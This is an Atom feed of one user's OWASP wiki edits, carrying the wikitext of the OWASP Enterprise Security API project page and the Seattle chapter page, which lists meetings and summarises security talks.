<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Mcurphey</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Mcurphey"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Mcurphey"/>
		<updated>2026-04-24T00:27:11Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Enterprise_Security_API&amp;diff=130445</id>
		<title>Category:OWASP Enterprise Security API</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Enterprise_Security_API&amp;diff=130445"/>
				<updated>2012-05-23T21:32:33Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Home  =&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI libraries also serve as a solid foundation for new development. &lt;br /&gt;
&lt;br /&gt;
Allowing for language-specific differences, all OWASP ESAPI versions have the same basic design: &lt;br /&gt;
&lt;br /&gt;
*'''There is a set of security control interfaces.''' They define, for example, the types of parameters that are passed to each type of security control.&lt;br /&gt;
&lt;br /&gt;
*'''There is a reference implementation for each security control.''' The logic is not organization-specific and the logic is not application-specific. An example: string-based input validation.&lt;br /&gt;
&lt;br /&gt;
*'''There are optionally your own implementations for each security control.''' There may be application logic contained in these classes which may be developed by or for your organization. An example: enterprise authentication.&lt;br /&gt;
&lt;br /&gt;
This project source code is licensed under the [http://en.wikipedia.org/wiki/BSD_license BSD license], which is very permissive and about as close to public domain as is possible. The project documentation is licensed under the [http://creativecommons.org/licenses/by-sa/2.0/ Creative Commons] license. You can use or modify ESAPI however you want, even include it in commercial products.&lt;br /&gt;
&lt;br /&gt;
The following organizations are a few of the many organizations that are starting to adopt ESAPI to secure their web applications: [http://www.americanexpress.com/ American Express], [http://www.apache.org/ Apache Foundation], [http://www.boozallen.com Booz Allen Hamilton], [http://www.aspectsecurity.com/ Aspect Security], [http://www.coraid.com Coraid], [http://www.thehartford.com/ The Hartford], [http://www.infinitecampus.com Infinite Campus], [http://www.lockheedmartin.com/ Lockheed Martin], [http://cwe.mitre.org/top25/index.html MITRE], [http://enterprise.spawar.navy.mil/ U.S. Navy - SPAWAR], [http://www.worldbank.org/ The World Bank], [http://www.sans.org/top25errors/ SANS Institute]. &lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using OWASP ESAPI. Include your name, organization's name, and brief description of how you are using it. The project lead can be reached [mailto:jeff.williams@owasp.org here]. &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Esapi-sponsors.PNG]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Let's talk here  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''ESAPI Communities''' &lt;br /&gt;
&lt;br /&gt;
Further development of ESAPI occurs through mailing list discussions and occasional workshops, and suggestions for improvement are welcome. For more information, please subscribe to one of the lists below.&lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/esapi-dev esapi-dev mailing list (this is the main list)] &lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/esapi-user esapi-user mailing list] &lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/esapi-php esapi-php mailing list] &lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/esapi-python esapi-python mailing list] &lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-esapi-ruby esapi-ruby mailing list] &lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-esapi-swingset esapi-swingset mailing list]&lt;br /&gt;
*[http://groups.google.com/group/cfesapi esapi-coldfusion mailing list]&lt;br /&gt;
&lt;br /&gt;
IRC Chat&lt;br /&gt;
&lt;br /&gt;
If you would rather chat with us about your problem or thoughts, you can join us in our IRC channel using an [http://www.google.com/search?q=irc+client IRC Client] or using FreeNode's [http://webchat.freenode.net WebChat] client.&lt;br /&gt;
&lt;br /&gt;
*Server: irc.freenode.net&lt;br /&gt;
*Channel: #esapi&lt;br /&gt;
&lt;br /&gt;
|&lt;br /&gt;
&lt;br /&gt;
== Got developer cycles?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-waiting.JPG]]'''ESAPI Coding''' &lt;br /&gt;
&lt;br /&gt;
The ESAPI project is always on the lookout for volunteers who are interested in contributing developer cycles. &lt;br /&gt;
&lt;br /&gt;
*[http://owasp-esapi-php.googlecode.com/files/esapi4php-contributing.pdf ESAPI for PHP Developer Onboarding Instructions] &lt;br /&gt;
*ESAPI for other languages developer onboarding instructions -- coming soon!&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== Related resources  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-satellite.jpg]]'''OWASP Cheat Sheet Series''' &lt;br /&gt;
&lt;br /&gt;
*[[SQL Injection Prevention Cheat Sheet]] &lt;br /&gt;
*[[XSS (Cross Site Scripting) Prevention Cheat Sheet]] &lt;br /&gt;
*[[Cryptographic Storage Cheat Sheet]]&lt;br /&gt;
*[[Authentication Cheat Sheet]]&lt;br /&gt;
*[[Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet]]&lt;br /&gt;
*[[Transport Layer Protection Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Downloads  =&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
[[Image:Asvs-step1.jpg]]'''1. About ESAPI''' &lt;br /&gt;
&lt;br /&gt;
*Data sheet([http://www.owasp.org/images/8/81/Esapi-datasheet.pdf PDF],[http://www.owasp.org/images/3/32/Esapi-datasheet.doc Word]) &lt;br /&gt;
*Project presentation ([http://owasp-esapi-java.googlecode.com/files/OWASP%20ESAPI.ppt PowerPoint]) &lt;br /&gt;
*Video presentation ([http://www.youtube.com/watch?v=QAPD1jPn04g YouTube])&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-step2.jpg]]'''2. Get ESAPI''' &lt;br /&gt;
&lt;br /&gt;
*[http://code.google.com/p/owasp-esapi-java/downloads/list ESAPI for Java Downloads] &lt;br /&gt;
*{{#switchtablink:.NET|ESAPI for .NET}}&amp;lt;br&amp;gt; &lt;br /&gt;
*{{#switchtablink:Classic ASP|ESAPI for Classic ASP}}&amp;lt;br&amp;gt; &lt;br /&gt;
*{{#switchtablink:PHP|ESAPI for PHP}}&amp;lt;br&amp;gt; &lt;br /&gt;
*{{#switchtablink:ColdFusion.2FCFML|ESAPI for ColdFusion &amp;amp; CFML}}&amp;lt;br&amp;gt; &lt;br /&gt;
*{{#switchtablink:Python|ESAPI for Python}}&amp;lt;br&amp;gt; &lt;br /&gt;
*[http://code.google.com/p/owasp-esapi-js/downloads/detail?name=esapi4js-0.1.3.zip ESAPI for Javascript]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Asvs-step3.jpg]]'''3. Learn ESAPI''' &lt;br /&gt;
&lt;br /&gt;
*ESAPI design patterns (not language-specific): [http://www.owasp.org/images/8/82/Esapi-design-patterns.pdf (PDF], [http://www.owasp.org/index.php/File:Esapi-design-patterns.doc Word], [http://www.owasp.org/images/8/87/Esapi-design-patterns.ppt PPT)] &lt;br /&gt;
*The [[ESAPI Swingset|ESAPI Swingset]] sample application demonstrates how to leverage ESAPI to protect a web application. &lt;br /&gt;
*LAMP should be spelled LAMPE ([http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf PDF]) &lt;br /&gt;
*ESAPI for Java interface documentation ([http://owasp-esapi-java.googlecode.com/svn/trunk_doc/index.html JavaDocs]) &lt;br /&gt;
*ESAPI for PHP interface documentation ([http://owasp-esapi-php.googlecode.com/svn/trunk_doc/latest/index.html phpdoc])&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= What I did with ESAPI  =&lt;br /&gt;
&lt;br /&gt;
*I used ESAPI for Java with Google AppEngine. I used it for simple validation and encoding. --[mailto:jeff.williams@owasp.org Jeff]&lt;br /&gt;
&lt;br /&gt;
*I used ESAPI for PHP with a custom web 2.0 corporate knowledge management application, made up of many open source and commercial applications integrated to work together. I added an organization- and application-specific &amp;quot;Adapter&amp;quot; control to wrap calls to the other ESAPI controls. --[mailto:mike.boberski@owasp.org Mike]&lt;br /&gt;
&lt;br /&gt;
*I used ESAPI for Java’s &amp;quot;Logger&amp;quot; control to make it easier for a US Government customer to meet C&amp;amp;amp;A requirements. --[mailto:dave.wichers@owasp.org Dave]&lt;br /&gt;
&lt;br /&gt;
*I used ESAPI for Java to build a low risk web application that was over 250,000+ lines of code in size. --[mailto:jim.manico@owasp.org Jim]&lt;br /&gt;
&lt;br /&gt;
*I used ESAPI for Java's &amp;quot;Authenticator&amp;quot; to replace a spaghetti-like mechanism in a legacy financial services web application. In hindsight I should have used the application-specific &amp;quot;Adapter&amp;quot; pattern mentioned by Mike above. The organization also uses the ESAPI Encryptor as an interface to a hardware security module. --[mailto:roman.hustad@yahoo.com Roman]&lt;br /&gt;
&lt;br /&gt;
*I use ESAPI for Java to educate developers about application security principles at several of the world’s largest organizations. --[mailto:jim.manico@owasp.org Jim]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= Glossary  =&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-letters.jpg]]'''ESAPI Terminology''' &lt;br /&gt;
&lt;br /&gt;
*'''adapter''' - Optionally, your own implementation of a security control. These classes may contain application logic, including proprietary information or logic, developed by or for your organization; that logic may be organization-specific and/or application-specific. &lt;br /&gt;
*'''built-in singleton design pattern''' - The &amp;quot;built-in&amp;quot; singleton design pattern refers to the replacement of security control reference implementations with your own implementations. ESAPI interfaces are otherwise left intact. &lt;br /&gt;
*'''codec''' - ESAPI encoder/decoder reference implementations. &lt;br /&gt;
*'''core''' - The ESAPI interfaces and reference implementations that are not intended to be replaced with enterprise-specific versions are called the ESAPI Core. &lt;br /&gt;
*'''exception''' - ESAPI exception reference implementations. &lt;br /&gt;
*'''extended factory design pattern''' - The &amp;quot;extended&amp;quot; factory design pattern refers to the addition of a new security control interface and a corresponding implementation. The ESAPI locator class is called in order to retrieve a singleton instance of your new security control, which in turn calls the ESAPI security control reference implementations and/or the reference implementations that you have replaced with your own. &lt;br /&gt;
*'''extended singleton design pattern''' - The &amp;quot;extended&amp;quot; singleton pattern refers to the replacement of security control reference implementations with your own implementations and the addition/modification/subtraction of corresponding security control interfaces. &lt;br /&gt;
*'''ES-enable (or ESAPI-enable)''' - Just as web applications and web services can be Public Key Infrastructure (PKI) enabled (PK-enabled) to perform, for example, certificate-based authentication, applications and services can be OWASP ESAPI-enabled (ES-enabled) so that they can protect themselves from attackers. &lt;br /&gt;
*'''filter''' - In ESAPI for Java, there is additionally an HTTP filter that can be called separately from the other controls. &lt;br /&gt;
*'''interfaces''' - There is a set of security control interfaces. There is no application logic contained in these interfaces. They define for example types of parameters that are passed to types of security controls. There is no proprietary information or logic contained in these interfaces. &lt;br /&gt;
*'''locator''' - The ESAPI security control interfaces include an &amp;quot;ESAPI&amp;quot; class that is commonly referred to as a &amp;quot;locator&amp;quot; class. The ESAPI locator class is called in order to retrieve singleton instances of individual security controls, which are then called in order to perform security checks (such as performing an access control check) or that result in security effects (such as generating an audit record). &lt;br /&gt;
*'''reference implementation''' - There is a reference implementation for each security control. There is application logic contained in these classes, i.e. contained in these interface implementations. However, the logic is not organization-specific and the logic is not application-specific. There is no proprietary information or logic contained in these reference implementation classes. &lt;br /&gt;
*'''Web Application Firewall (WAF)''' - In ESAPI for Java, there is additionally a Web Application Firewall (WAF) that can be called separately from the other controls.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= Java EE  =&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_Java_EE_Version | OWASP Project Identification Tab}} &lt;br /&gt;
&lt;br /&gt;
= Dot NET  =&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_.NET_Version | OWASP Project Identification Tab}} &lt;br /&gt;
&lt;br /&gt;
= Classic ASP  =&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_Classic_ASP_Version | OWASP Project Identification Tab}} &lt;br /&gt;
&lt;br /&gt;
= PHP  =&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_PHP_Version | OWASP Project Identification Tab}} &lt;br /&gt;
&lt;br /&gt;
= ColdFusion CFML =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!---{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_ColdFusion/CFML | OWASP Project Identification Tab}}---&amp;gt; &lt;br /&gt;
{{:Projects/OWASP ESAPI for ColdFusion - CFML Project | Project About}}&lt;br /&gt;
&lt;br /&gt;
= Python =&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_Python_Version | OWASP Project Identification Tab}} &lt;br /&gt;
&lt;br /&gt;
= JavaScript =&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_JavaScript_Version  | OWASP Project Identification Tab}} &lt;br /&gt;
&lt;br /&gt;
= Objective C =&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP ESAPI Objective - C Project | Project About}}&lt;br /&gt;
&lt;br /&gt;
= Force com =&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_Force.com_Version | OWASP Project Identification Tab}} &lt;br /&gt;
&lt;br /&gt;
= Ruby =&lt;br /&gt;
&lt;br /&gt;
{{:Projects/Owasp Esapi Ruby | Project About}} &lt;br /&gt;
&lt;br /&gt;
= Swingset =&lt;br /&gt;
&lt;br /&gt;
The ESAPI Swingset Project divides itself into sub-projects, i.e., [[Projects/OWASP ESAPI Swingset Interactive Project|Swingset Interactive]] and [[Projects/OWASP ESAPI Swingset Demo Project|Swingset Demo]]. &lt;br /&gt;
&lt;br /&gt;
= ESAPI C =&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP ESAPI C Project | Project About}} &lt;br /&gt;
&lt;br /&gt;
= ESAPI CPP =&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP ESAPI C++ Project | Project About}} &lt;br /&gt;
&lt;br /&gt;
= ESAPI Perl =&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP ESAPI Perl Project | Project About}} &lt;br /&gt;
&lt;br /&gt;
= Project Details  =&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Enterprise_Security_API | OWASP Project Identification Tab}} &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{OWASP Builders}}&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Seattle&amp;diff=119196</id>
		<title>Seattle</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Seattle&amp;diff=119196"/>
				<updated>2011-10-17T03:41:49Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Seattle|extra=The chapter leader is [mailto:mark@curphey.com Mark Curphey] ([http://www.twitter.com/curphey @curphey]). We meet monthly, usually in downtown Seattle, and manage our events using MeetUp. You must RSVP to attend meetings using [http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/ Meetup]. The chapter has a Twitter account [http://www.twitter.com/owaspseattle @owaspseattle] for local and event news.&lt;br /&gt;
&lt;br /&gt;
|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-seattle|emailarchives=http://lists.owasp.org/pipermail/owasp-seattle}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Next Meeting - November 17th, 2011 ==&lt;br /&gt;
&lt;br /&gt;
[http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/events/37444702/ Register for this event]&lt;br /&gt;
&lt;br /&gt;
Talk : [http://blogs.adobe.com/asset/2011/04/nosql-but-even-less-security.html No SQL and even less security].&lt;br /&gt;
Speaker : Bryan Sullivan&lt;br /&gt;
&lt;br /&gt;
Location : &lt;br /&gt;
KPMG, Suite 900&lt;br /&gt;
801 second avenue&lt;br /&gt;
Seattle, WA&lt;br /&gt;
&lt;br /&gt;
Time : 6pm to 8pm&lt;br /&gt;
&lt;br /&gt;
To attend this meeting you must RSVP via the Meetup page due to limited spaces. &lt;br /&gt;
&lt;br /&gt;
[http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/events/37444702/ Register for this event]&lt;br /&gt;
&lt;br /&gt;
== December Meeting ==&lt;br /&gt;
&lt;br /&gt;
The December meeting is being scheduled now but will be held on December 15th at Google's offices in Fremont. &lt;br /&gt;
&lt;br /&gt;
==Past Events==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 11 August (Wednesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 8/11/2010 @ 6:30ish&lt;br /&gt;
&lt;br /&gt;
''Presentations:''&lt;br /&gt;
&lt;br /&gt;
'''How OWASP Works and Guided Tour of OWASP Projects'''&lt;br /&gt;
 &lt;br /&gt;
'''Speaker: Dinis Cruz'''&lt;br /&gt;
&lt;br /&gt;
This presentation will focus on my experience in getting things done at OWASP, what resources are available and what types of initiatives the local chapters should be doing. In addition to a quick overview of a number of key OWASP projects, this talk will also provide a tutorial on how the OWASP WIKI (MediaWiki based) can be used as a database (using the MediaWiki templates technology).&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Using the O2 Platform to Consume OWASP projects'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Dinis Cruz'''&lt;br /&gt;
&lt;br /&gt;
This presentation will focus on how to consume the OWASP Wiki and a number of OWASP projects using the OWASP O2 Platform. The O2 Platform has powerful technology and capabilities for both BlackBox and WhiteBox analysis, and this presentation will provide examples on how to use O2 with: WebGoat, WebScarab, Code Crawler, Dir Buster, Testing Guide, Code Review Guide and OpenSAMM.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The O2 Platform is focused on automating application security knowledge and workflows. It is specifically designed for developers and security consultants to be able to perform quick, effective and thorough 'source-code-driven' application security reviews (BlackBox + WhiteBox). In addition to the manual findings created/discovered by security consultants, the OWASP O2 Platform allows the easy consumption of results from multiple OWASP projects and commercial scanning tools. This allows security consultants to find, exploit and automate (via Unit Tests) security vulnerabilities usually dismissed by the community as impossible to find/recreate. More importantly, it provides the Security Consultants a mechanism to: a) 'talk' with developers (via UnitTest), b) give developers a way to replicate the reported vulnerabilities and &amp;quot;check if it's fixed&amp;quot;, and c) engage in a two-way conversation on the best way to fix/remediate those vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
'''Dinis Cruz''' is a Security Consultant based in London (UK) and specialized in: ASP.NET/J2EE Application Security, Application Security audits and .NET Security Curriculum Development.&lt;br /&gt;
&lt;br /&gt;
For the past years Dinis has focused on the field of static source code analysis. From May 2007 to Dec 2009 he worked as an independent consultant for Ounce Labs (bought by IBM in July 2009), where during active security engagements using Ounce's technology he developed the open source codebase which is now the foundation of the OWASP O2 Platform.&lt;br /&gt;
&lt;br /&gt;
Dinis is currently focused on making the O2 Platform the industry standard for consuming, instrumenting and data-sharing between the multiple WebAppSec tools, the Security consultants and the final developers.&lt;br /&gt;
&lt;br /&gt;
Dinis is also an active trainer on .Net security, having written and delivered courses for IOActive, Foundstone, Intense School and KPMG (at multiple locations including BlackHat), and has delivered a number of presentations and keynote speeches at multiple OWASP and security related conferences.&lt;br /&gt;
&lt;br /&gt;
At OWASP, Dinis is the leader of the OWASP O2 Platform project, member of the OWASP Global Projects Committee, chair of the OWASP Connections Committee and member of the OWASP Board.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 28 April (Wednesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 4/28/2010 @ 6:30ish&lt;br /&gt;
&lt;br /&gt;
''Presentations:''&lt;br /&gt;
&lt;br /&gt;
'''When Tools Are Not Enough – Best Practices for Securing Web Applications'''&lt;br /&gt;
&lt;br /&gt;
'''Speakers:''' Walter Pearce &amp;amp; Wade Winright from IOActive&lt;br /&gt;
&lt;br /&gt;
The demands of regulatory compliance may have you looking to vulnerability scanning tools in the hopes of finding a silver bullet to examine your web applications. However, it is not realistic to expect scanners alone to accurately determine the impact of the web application vulnerabilities they detect. In this presentation, Walter Pearce and Wade Winright will discuss best practices for securing web applications, including how to effectively utilize tools in conjunction with penetration testing.&lt;br /&gt;
&lt;br /&gt;
'''Walter Pearce''' is a Senior Security Consultant at IOActive, experienced in enterprise-level application assessment and consultation. At IOActive he performs penetration testing, identifies system vulnerabilities, and designs custom security solutions for clients in software development, telecommunications, financial services, and professional services. Pearce has performed security assessments and IT security support services for many companies in the Fortune 100, including involvement in the largest existing penetration test of a major educational institution. He regularly leads IOActive training courses on numerous topics that include web application security, secure coding in C# or C++, and threat modeling.&lt;br /&gt;
&lt;br /&gt;
'''Wade Winright''' is a Security Consultant at IOActive, experienced in security testing, and network and systems installation and configuration. At IOActive he performs vulnerability and enterprise risk assessments of application, systems, and infrastructure, and designs custom security solutions for clients in software development, telecommunications, financial services, and professional services.&lt;br /&gt;
Winright is a SANS GIAC Certified Incident Handler with a focus on incident handling and hacker tools/techniques, and is also certified by the E-Commerce Council CEH, focused on vulnerability/penetration testing and countermeasures.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
'''Protecting Your Applications from Backdoors:'''&lt;br /&gt;
&lt;br /&gt;
How to Secure Your Business Critical Applications from Time Bombs, Backdoors &amp;amp; Data&lt;br /&gt;
&lt;br /&gt;
'''Speaker:''' Clint Pollock from Veracode&lt;br /&gt;
&lt;br /&gt;
With the increasing practice of outsourcing and using 3rd party libraries, it is nearly impossible for an enterprise to identify the pedigree and security of the software running its business critical applications. As a result, backdoors and malicious code are increasingly becoming the prevalent attack vector used by hackers. Whether you manage internal development activities, work with third party developers or are developing a COTS application for enterprise, your mandate is clear: safeguard your code and make application security a priority for internal and external development teams. In this session we will cover:&lt;br /&gt;
*Prevalence of backdoors and malicious code in third party attacks&lt;br /&gt;
*Definitions and classifications of backdoors and their impact on your applications&lt;br /&gt;
*Methods to identify, track and remediate these vulnerabilities&lt;br /&gt;
&lt;br /&gt;
'''Clint Pollock''' is a Senior Solutions Architect at Veracode. Since 1997, he has also created security solutions for large-scale enterprise environments on behalf of CREDANT Technologies and Netegrity. In his current role, Clint helps globally distributed organizations evaluate, track, and mitigate their online business risk. Clint's greatest strengths are his enthusiasm, experience and determination to help customers succeed in maintaining secure, compliant systems, and avoid the consequences and bad headlines that come with application security breaches. Clint resides in Chicago, IL.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 3 February (Wednesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 2/3/2010 @ 6:30ish&lt;br /&gt;
&lt;br /&gt;
'''Speakers:''' &lt;br /&gt;
&lt;br /&gt;
'''Speaker: Hidetake Jo'''&lt;br /&gt;
&lt;br /&gt;
'''Same Origin Policy'''&lt;br /&gt;
&lt;br /&gt;
'''Presentations:'''&lt;br /&gt;
&lt;br /&gt;
[[File:SameOriginPolicy.ppt]] - Same Origin Policy slide deck&lt;br /&gt;
&lt;br /&gt;
[[File:Rendezvous.ppt]] - Presentation on the Rendezvous toolset&lt;br /&gt;
&lt;br /&gt;
Same origin policy is a simple and important security policy which protects millions of users on the web. Oftentimes the policy is oversimplified and there is a misconception that there is one consistent policy being used across all web technologies. Unfortunately this couldn’t be further from the truth. Different browser brands, RIA plugins, various scripting languages and features within the browser environment have their own interpretation of the same origin policy. Not understanding the subtle differences can be catastrophic to web security. This presentation tries to summarize the deltas in the same origin policy. This is also a call for action to involve the community to more comprehensively document the policies. &lt;br /&gt;
&lt;br /&gt;
'''Hidetake Jo''' is part of the Trustworthy Computing team in Office. He works with teams throughout Office to identify threats and ways to mitigate those threats; he also gets to break stuff. Hidetake has written many penetration testing tools that are used throughout Microsoft.&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Pravir Chandra'''&lt;br /&gt;
&lt;br /&gt;
'''Open Software Assurance Maturity Model (OpenSAMM)'''&lt;br /&gt;
&lt;br /&gt;
'''Presentation:''' &lt;br /&gt;
&lt;br /&gt;
Slide deck can be found [http://www.opensamm.org/downloads/OpenSAMM-1.0.ppt here]&lt;br /&gt;
&lt;br /&gt;
The Open Software Assurance Maturity Model (SAMM) (http://www.opensamm.org/) is a flexible and prescriptive framework for building security into a software development organization. Covering more than typical SDLC-based models for security, SAMM enables organizations to self-assess their security assurance program and then use recommended roadmaps to improve in a way that's aligned to the specific risks facing the organization. Beyond that, SAMM enables creation of scorecards for an organization's effectiveness at secure software development throughout the typical governance, development, and deployment business functions. Scorecards also enable management within an organization to demonstrate quantitative improvements through iterations of building a security assurance program. This workshop will introduce the SAMM framework and walk through useful activities such as assessing an assurance program, mapping an existing organization to a recommended roadmap, and iteratively building an assurance program. Time allowing, additional case studies will also be discussed. OpenSAMM is an open and free project and has recently been donated to the Open Web Application Security Project (OWASP) Foundation. For more information on OpenSAMM, visit http://www.opensamm.org/.&lt;br /&gt;
&lt;br /&gt;
'''Pravir Chandra''' is Director of Strategic Services at Fortify Software and works with clients on software security assurance programs. Pravir is recognized for his expertise in software security, code analysis, and his ability to strategically apply technical knowledge. Prior to Fortify, he was a Principal Consultant affiliated with Cigital and led large software security programs at Fortune 500 companies. Pravir co-founded Secure Software, Inc. and was Chief Security Architect prior to its acquisition by Fortify. He recently created and led the Open Software Assurance Maturity Model (OpenSAMM) project with the OWASP Foundation, leads the OWASP CLASP project, and also serves as a member of the OWASP Global Projects Committee. Pravir is author of the book Network Security with OpenSSL.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 11 August (Tuesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 8/11/2009 @ 6:30ish&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Anil Kumar Revuru'''&lt;br /&gt;
&lt;br /&gt;
'''Slides: ''' [[file:Anti-XSS_3.0_RV.pptx]]&lt;br /&gt;
&lt;br /&gt;
'''The Microsoft Anti-Cross-Site Scripting Library'''&lt;br /&gt;
&lt;br /&gt;
The Microsoft Anti-Cross-Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique — sometimes referred to as the principle of inclusions — to provide protection against XSS attacks. This approach works by first defining a valid or allowable set of characters, and then encoding anything outside this set (invalid characters or potential attacks). The white-listing approach provides several advantages over other encoding schemes. The following are some new features of the Anti-XSS library v3.0.&lt;br /&gt;
